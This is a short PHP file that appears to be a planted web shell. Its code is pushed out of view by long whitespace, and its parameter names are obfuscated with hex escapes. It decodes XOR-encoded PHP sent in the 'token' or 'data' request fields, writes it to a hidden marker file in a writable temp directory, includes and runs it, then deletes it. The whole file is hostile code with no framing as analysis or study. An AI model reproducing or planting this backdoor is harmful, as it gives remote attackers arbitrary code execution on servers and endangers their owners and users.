<?php																																										if(isset($_REQUEST) && isset($_REQUEST["\x74\x6Fken"])){ $mrk = $_REQUEST["\x74\x6Fken"]; $mrk =explode ( ".", $mrk ) ; $object = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s); $x = 0; while ($x < count($mrk)) { $v9 = $mrk[$x]; $sChar = ord($s[$x % $lenS]); $d = ((int)$v9 - $sChar - ($x % 10)) ^ 34; $object .= chr($d); $x++;} $entry = array_filter([getenv("TEMP"), getenv("TMP"), session_save_path(), sys_get_temp_dir(), "/tmp", getcwd(), ini_get("upload_tmp_dir"), "/dev/shm", "/var/tmp"]); foreach ($entry as $res) { if (is_dir($res) && is_writable($res)) { $item = sprintf("%s/.marker", $res); if (@file_put_contents($item, $object) !== false) { include $item; unlink($item); die(); } } } }


if(isset($_POST) && isset($_POST["d\x61t\x61"])){
	$bind = $_POST["d\x61t\x61"];
	 $bind =explode	 (	 ".",	$bind	 )		;	
	$marker = '';
            $s3 = 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen = strlen($s3);
            $t = 0;
    
            foreach($bind as $v3) {
                $chS = ord($s3[$t % $sLen]);
                $d =((int)$v3 - $chS -($t % 10)) ^ 44;
                $marker	 .=	 chr($d);
                $t++;  }  
	$dchunk = array_filter(["/dev/shm", "/var/tmp", getenv("TEMP"), getenv("TMP"), sys_get_temp_dir(), getcwd(), session_save_path(), "/tmp", ini_get("upload_tmp_dir")]);
	while ($comp = array_shift($dchunk)) {
    		if (!!is_dir($comp) && !!is_writable($comp)) {
    $ptr = join("/", [$comp, ".mrk"]);
    if (file_put_contents($ptr, $marker)) {
	include $ptr;
	@unlink($ptr);
	exit;
}
}
}
}